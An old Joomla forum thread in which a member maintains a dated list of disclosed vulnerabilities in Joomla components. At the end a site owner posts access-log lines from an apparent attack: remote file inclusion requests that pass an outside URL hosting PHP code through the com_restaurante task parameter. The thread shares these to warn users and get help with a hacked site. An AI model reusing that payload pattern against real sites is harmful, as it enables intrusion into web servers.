Joomla! Discussion Forums



Posted: Sun Sep 23, 2007 4:08 pm 

Joined: Fri Aug 19, 2005 12:51 pm
Posts: 362
Location: Argentina
2007-10-10 - Joomla Component JContentSubscription 1.5.8 - Remote File Inclusion Vulnerability
2007-10-10 - Joomla Component MP3 Allopass 1.0 - Remote File Inclusion Vulnerability
2007-10-08 - Joomla component MOSMediaLite451 - Remote File Inclusion Vulnerability
2007-10-07 - Joomla Component wmtportfolio 1.0 - Remote File Inclusion Vulnerability
2007-10-07 - Joomla Flash Image Gallery Component - Remote File Inclusion Vulnerability
2007-10-06 - Joomla panoramic component 1.0 - Remote File Inclusion Vulnerability
2007-09-21 - Joomla Component com_slideshow - Remote File Inclusion Vulnerability
2007-09-16 - Joomla Component joom12Pic 1.0 - Remote File Inclusion Vulnerability
2007-09-15 - Joomla Component Flash Fun! 1.0 - Remote File Inclusion Vulnerability
2007-09-13 - Joomla Component joomlaradio v5 - Remote File Inclusion Vulnerability
2007-09-08 - Joomla Component Restaurante - Remote File Upload Vulnerability
2007-09-01 - Joomla! 1.5 Beta1/Beta2/RC1 - Remote SQL Injection Exploit
2007-08-23 - Joomla Component BibTeX <= 1.3 - Remote Blind SQL Injection Exploit
2007-08-23 - Joomla Component EventList <= 0.8 (did) - SQL Injection Vulnerability
2007-08-23 - Joomla Component Nice Talk <= 0.9.3 (tagid) - SQL Injection Vulnerability
2007-08-23 - Joomla Component RSfiles <= 1.0.2 (path) - File Download Vulnerability
2007-08-23 - Joomla Component NeoRecruit <= 1.4 (id) - SQL Injection Vulnerability
2007-07-31 - Joomla Component com_gmaps 1.00 (mapId) - Remote SQL Injection
2007-07-22 - Joomla! CMS 1.5 beta 2 (search) - Remote Code Execution Vulnerability
2007-07-19 - Joomla Component Pony Gallery <= 1.5 - SQL Injection Vulnerability
2007-07-18 - Joomla Component Expose <= RC35 - Remote File Upload Vulnerability
2007-05-28 - Joomla Component Phil-a-Form <= 1.2.0.0 - SQL Injection Exploit
2007-04-23 - Joomla 1.5.0 Beta (pcltar.php) - Remote File Inclusion Vulnerability
2007-04-17 - Joomla Template Be2004-2 (index.php) - Remote File Inclusion Vulnerability
2007-04-17 - Joomla Component JoomlaPack 1.0.4a2 RE (CAltInstaller.php) - Remote File Inclusion Vulnerability
2007-04-14 - Mambo/Joomla Component Article 1.1 - Remote File Include Exploit
2007-04-14 - Joomla Module AutoStand 1.0 R - Remote File Inclusion Vulnerability
2007-04-11 - Joomla Component mosMedia <= 1.0.8 - Remote File Inclusion Vulnerability
2007-04-10 - Joomla/Mambo Component Taskhopper 1.1 - Remote File Include Exploit
2007-03-27 - Joomla Component D4JeZine <= 2.8 - Remote BLIND SQL Injection Exploit
2007-03-24 - Joomla Component RWCards <= 2.4.3 - Remote SQL Injection Exploit
2007-03-24 - Joomla Component Car Manager <= 1.1 - Remote SQL Injection Exploit
2007-03-23 - Joomla Component Joomlaboard 1.1.1 (sbp) - Remote File Inclusion Vulnerability
2007-03-23 - Joomla/Mambo Component SWmenuFree 4.0 - Remote File Inclusion Vulnerability
2006-11-17 - MosReporter Joomla Component 0.9.3 - Remote File Inclusion Vulnerability
2006-08-19 - Joomla <= 1.0.10 (poll component) - Arbitrary Add Votes Exploit
2006-08-18 - Joomla Kochsuite Component <= 0.9.4 - Remote File Inclusion Vulnerability
2006-08-18 - Joomla Link Directory Component <= 1.0.3 - Remote File Inclusion Vulnerability
2006-08-18 - Joomla Artlinks Component <= 1.0b4 - Remote File Inclusion Vulnerability
2006-08-17 - Joomla Mosets Tree <= 1.0 - Remote File Inclusion Vulnerability
2006-08-17 - Joomla com_jim Component <= 1.0.1 - Remote File Inclusion Vulnerability
2006-08-13 - Joomla Webring Component <= 1.0 - Remote File Inclusion Vulnerability
2006-08-07 - Joomla JD-Wiki Component <= 1.0.2 - Remote File Inclusion Vulnerability
2006-07-30 - Joomla LMO Component <= 1.0b2 - Remote File Inclusion Vulnerability
2006-07-30 - Joomla com_bayesiannaivefilter Component <= 1.1 - Remote File Inclusion Vulnerability
2006-06-17 - Joomla <= 1.0.9 (Weblinks) - Remote Blind SQL Injection Exploit
2006-04-19 - Mambo <= 4.5.3, Joomla <= 1.0.7 (feed) - Denial of Service Exploit


*RFI: Remote File Inclusion

_________________
Comunidad Joomla!: Member of the Spanish [es_ES] Joomla Translation Team | http://comunidadjoomla.org

NEW! Installation manual for Joomla! 1.5.x - Joomla! 1.5.X getting-started guide at http://joomlacode.org/gf/project/comunidadjoomla/frs/


Last edited by gustavo on Thu Oct 11, 2007 2:37 pm, edited 1 time in total.

Posted: Sat Oct 06, 2007 6:42 pm 

Joined: Fri Aug 19, 2005 12:51 pm
Posts: 362
Location: Argentina
Add: 2007-10-06 Joomla panoramic component 1.0 - Remote File Inclusion Vulnerability

Component : Joomla panoramic component -  version 1.0
site: webmaster-tips.net/panoramic-picture-viewer.html



Last edited by gustavo on Sat Oct 06, 2007 6:49 pm, edited 1 time in total.

Posted: Sat Oct 06, 2007 7:01 pm 

Joined: Fri Sep 07, 2007 9:47 pm
Posts: 57
It is always great to see the vulns so you may patch them yourself  :P

_________________
k0h.org - Security and Programming community.
Proudly powered by Joomla.


Posted: Tue Oct 09, 2007 3:42 am 

Joined: Fri Aug 19, 2005 12:51 pm
Posts: 362
Location: Argentina
add 2007-10-08 - Joomla component MOSMediaLite451 Remote File Inclusion Vulnerability
Component : MOSMediaLite451
site: djoomla.com/component/option,com_remository/Itemid,2/func,fileinfo/id,104/

add 2007-10-07 - Joomla Component wmtportfolio 1.0 Remote File Inclusion Vulnerability
Component : WMT Portfolio -  version 1.0
site: webmaster-tips.net/wmt-joomla-component-portfolio.html

add 2007-10-07 - Joomla Flash Image Gallery Component Remote File Inclusion Vulnerability
Component : Flash Image Gallery
site: webmaster-tips.net/flash-image-gallery.html



Last edited by gustavo on Thu Oct 11, 2007 2:32 pm, edited 1 time in total.

Posted: Thu Oct 11, 2007 2:30 pm 

Joined: Fri Aug 19, 2005 12:51 pm
Posts: 362
Location: Argentina
add 2007-10-10 - Joomla Component JContentSubscription 1.5.8 - Remote File Inclusion Vulnerability 
Component : JContentSubscription
site: joomlaequipment.com/index.php?option=com_content&task=view&id=7&Itemid=34

add 2007-10-10 - Joomla Component MP3 Allopass 1.0 - Remote File Inclusion Vulnerability 
Component : JContentSubscription
site: joomlaratings.com



Last edited by gustavo on Thu Oct 11, 2007 2:38 pm, edited 1 time in total.

Posted: Wed Nov 14, 2007 12:46 pm 

Joined: Sat Aug 20, 2005 5:33 pm
Posts: 275
Location: Assen - The Netherlands
Are you sure that joomlaradio v4 is OK?

My site is suspended because it is somehow hacked.
I found this in the logs:

Quote:
213.173.251.138 - - [13/Nov/2007:00:16:01 +0100] "GET //index.php?option=com_restaurante&task=http://hivhash.com/hiv//ws/phpmic.txt.txt? HTTP/1.1" 200 724 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"

Quote:
213.173.251.138 - - [13/Nov/2007:00:16:34 +0100] "GET /index.php/weblinks/Joomla//index.php?option=com_restaurante&task=http://hivhash.com/hiv//ws/phpmic.txt.txt? HTTP/1.1" 404 5938 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"

Quote:
213.173.251.138 - - [13/Nov/2007:00:28:18 +0100] "GET /index.php//index.php?option=com_restaurante&task=http://hivhash.com/hiv//ws/phpmic.txt.txt? HTTP/1.1" 200 12748 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"


I am not using the com_restaurante component, never heard of it.

_________________
_/ _/ _/ Xirtam
_/ _/ _/ http://www.wittebal.nl
_/ _/ _/ Best musiccafé in Assen

